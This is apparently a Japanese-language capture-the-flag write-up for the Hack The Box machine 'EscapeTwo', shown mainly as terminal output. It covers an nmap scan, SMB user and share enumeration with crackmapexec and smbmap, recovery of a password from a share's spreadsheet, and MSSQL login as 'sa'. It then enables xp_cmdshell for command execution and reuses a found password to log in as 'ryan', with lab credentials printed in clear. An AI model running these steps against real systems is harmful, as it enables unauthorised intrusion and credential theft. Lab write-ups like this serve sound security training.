┌──(kali㉿kali)-[~/Downloads]
└─$ sudo nmap 10.10.11.51 -p- -sV -vv --open --reason -Pn
[sudo] password for kali:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-11 23:35 EST
NSE: Loaded 46 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 23:35
Completed Parallel DNS resolution of 1 host. at 23:35, 0.02s elapsed
Initiating SYN Stealth Scan at 23:35
Scanning 10.10.11.51 [65535 ports]
Discovered open port 445/tcp on 10.10.11.51
Discovered open port 135/tcp on 10.10.11.51
Discovered open port 53/tcp on 10.10.11.51
Discovered open port 139/tcp on 10.10.11.51
Discovered open port 49685/tcp on 10.10.11.51
SYN Stealth Scan Timing: About 2.19% done; ETC: 23:58 (0:23:03 remaining)
SYN Stealth Scan Timing: About 4.63% done; ETC: 23:57 (0:20:57 remaining)
SYN Stealth Scan Timing: About 7.90% done; ETC: 23:54 (0:17:41 remaining)
SYN Stealth Scan Timing: About 10.93% done; ETC: 23:53 (0:16:26 remaining)
Discovered open port 49687/tcp on 10.10.11.51
SYN Stealth Scan Timing: About 14.72% done; ETC: 23:53 (0:15:27 remaining)
SYN Stealth Scan Timing: About 18.75% done; ETC: 23:52 (0:13:43 remaining)
SYN Stealth Scan Timing: About 22.87% done; ETC: 23:51 (0:12:22 remaining)
SYN Stealth Scan Timing: About 27.57% done; ETC: 23:50 (0:10:57 remaining)
Discovered open port 49686/tcp on 10.10.11.51
SYN Stealth Scan Timing: About 33.02% done; ETC: 23:49 (0:09:28 remaining)
Discovered open port 5985/tcp on 10.10.11.51
SYN Stealth Scan Timing: About 37.62% done; ETC: 23:48 (0:08:34 remaining)
Discovered open port 49718/tcp on 10.10.11.51
SYN Stealth Scan Timing: About 42.89% done; ETC: 23:48 (0:07:33 remaining)
SYN Stealth Scan Timing: About 48.83% done; ETC: 23:47 (0:06:28 remaining)
Discovered open port 636/tcp on 10.10.11.51
Discovered open port 1433/tcp on 10.10.11.51
SYN Stealth Scan Timing: About 55.18% done; ETC: 23:47 (0:05:25 remaining)
Discovered open port 88/tcp on 10.10.11.51
Discovered open port 49794/tcp on 10.10.11.51
Discovered open port 47001/tcp on 10.10.11.51
SYN Stealth Scan Timing: About 61.63% done; ETC: 23:46 (0:04:28 remaining)
Discovered open port 3269/tcp on 10.10.11.51
SYN Stealth Scan Timing: About 68.57% done; ETC: 23:46 (0:03:31 remaining)
Discovered open port 49665/tcp on 10.10.11.51
Discovered open port 3268/tcp on 10.10.11.51
Discovered open port 49667/tcp on 10.10.11.51
Discovered open port 464/tcp on 10.10.11.51
Discovered open port 49739/tcp on 10.10.11.51
SYN Stealth Scan Timing: About 75.54% done; ETC: 23:46 (0:02:39 remaining)
SYN Stealth Scan Timing: About 80.81% done; ETC: 23:46 (0:02:06 remaining)
Discovered open port 49664/tcp on 10.10.11.51
SYN Stealth Scan Timing: About 86.23% done; ETC: 23:46 (0:01:31 remaining)
Discovered open port 49702/tcp on 10.10.11.51
Discovered open port 9389/tcp on 10.10.11.51
Discovered open port 593/tcp on 10.10.11.51
SYN Stealth Scan Timing: About 91.46% done; ETC: 23:46 (0:00:56 remaining)
Discovered open port 49666/tcp on 10.10.11.51
Discovered open port 389/tcp on 10.10.11.51
Completed SYN Stealth Scan at 23:45, 641.77s elapsed (65535 total ports)
Initiating Service scan at 23:45
Scanning 26 services on 10.10.11.51
Service scan Timing: About 61.54% done; ETC: 23:47 (0:00:34 remaining)
Completed Service scan at 23:47, 68.27s elapsed (26 services on 1 host)
NSE: Script scanning 10.10.11.51.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 23:47
Completed NSE at 23:47, 1.66s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 23:47
Completed NSE at 23:47, 1.83s elapsed
Nmap scan report for 10.10.11.51
Host is up, received user-set (0.34s latency).
Scanned at 2025-01-11 23:35:13 EST for 714s
Not shown: 65509 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-01-12 04:46:02Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49685/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49686/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49687/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49702/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49718/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49739/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49794/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 713.83 seconds
Raw packets sent: 131422 (5.783MB) | Rcvd: 402 (17.688KB)
ユーザを調べてみます
kali㉿kali)-[~/Downloads]
└─$ crackmapexec smb 10.10.11.51 --users -u 'rose' -p 'KxEPkKe6R8su'
SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.51 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
SMB 10.10.11.51 445 DC01 [+] Enumerated domain user(s)
SMB 10.10.11.51 445 DC01 sequel.htb\ca_svc badpwdcount: 5 desc:
SMB 10.10.11.51 445 DC01 sequel.htb\rose badpwdcount: 0 desc:
SMB 10.10.11.51 445 DC01 sequel.htb\sql_svc badpwdcount: 1 desc:
SMB 10.10.11.51 445 DC01 sequel.htb\oscar badpwdcount: 0 desc:
SMB 10.10.11.51 445 DC01 sequel.htb\ryan badpwdcount: 0 desc:
SMB 10.10.11.51 445 DC01 sequel.htb\michael badpwdcount: 1 desc:
SMB 10.10.11.51 445 DC01 sequel.htb\krbtgt badpwdcount: 1 desc: Key Distribution Center Service Account
SMB 10.10.11.51 445 DC01 sequel.htb\Guest badpwdcount: 1 desc: Built-in account for guest access to the computer/domain
SMB 10.10.11.51 445 DC01 sequel.htb\Administrator badpwdcount: 1 desc: Built-in account for administering the computer/domainSMBでアクセスできるShareフォルダを確認します
「Accounting Department」が怪しそうです
┌──(kali㉿kali)-[~/htb/escapetwo]
└─$ crackmapexec smb 10.10.11.51 -u 'rose' -p 'KxEPkKe6R8su' --shares
SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.51 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
SMB 10.10.11.51 445 DC01 [+] Enumerated shares
SMB 10.10.11.51 445 DC01 Share Permissions Remark
SMB 10.10.11.51 445 DC01 ----- ----------- ------
SMB 10.10.11.51 445 DC01 Accounting Department READ
SMB 10.10.11.51 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.51 445 DC01 C$ Default share
SMB 10.10.11.51 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.51 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.51 445 DC01 SYSVOL READ Logon server share
SMB 10.10.11.51 445 DC01 Users READ 「accounting_2024.xlsx」,「accounts.xlsx」があるのでダウンロードします
┌──(kali㉿kali)-[~/htb/escapetwo]
└─$ smbmap -u rose -p KxEPkKe6R8su -H 10.10.11.51 -r "Accounting Department"
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - [email protected]<mailto:[email protected]>
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.11.51:445 Name: dc01.sequel.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
Accounting Department READ ONLY
./Accounting Department
dr--r--r-- 0 Sun Jun 9 07:11:31 2024 .
dr--r--r-- 0 Sun Jun 9 07:11:31 2024 ..
fr--r--r-- 10217 Sun Jun 9 07:11:31 2024 accounting_2024.xlsx
fr--r--r-- 6780 Sun Jun 9 07:11:31 2024 accounts.xlsx
「accounts.xlsx」は破損しているようですが、基本的にzipファイルなので、
kaliのArchiveで開きます
Excelの文字データは、「sharedString.xml」に書かれており、開くとパスワードが書かれていました
mssqlが動いており「sa」でログインできそうだったので試したところログインできました
sudo impacket-mssqlclient 'sa:MSSQLP@ssw0rd!'@10.10.11.51
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (sa dbo@master)> EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
[*] INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (sa dbo@master)> EXEC master..xp_cmdshell 'whoami'
output
--------------
sequel\sql_svc
NULL
SQL (sa dbo@master)> いろいろ探したところ、コンフィグにパスワードがありました
ゲットしたパスワードで他のユーザでログインできるかチェックしたところ「ryan」が同じパスワードでした
SMBClientでアクセスして無事ユーザのフラグを取得できました
smbclient \\\\10.10.11.51\\Users -U ryan
コメント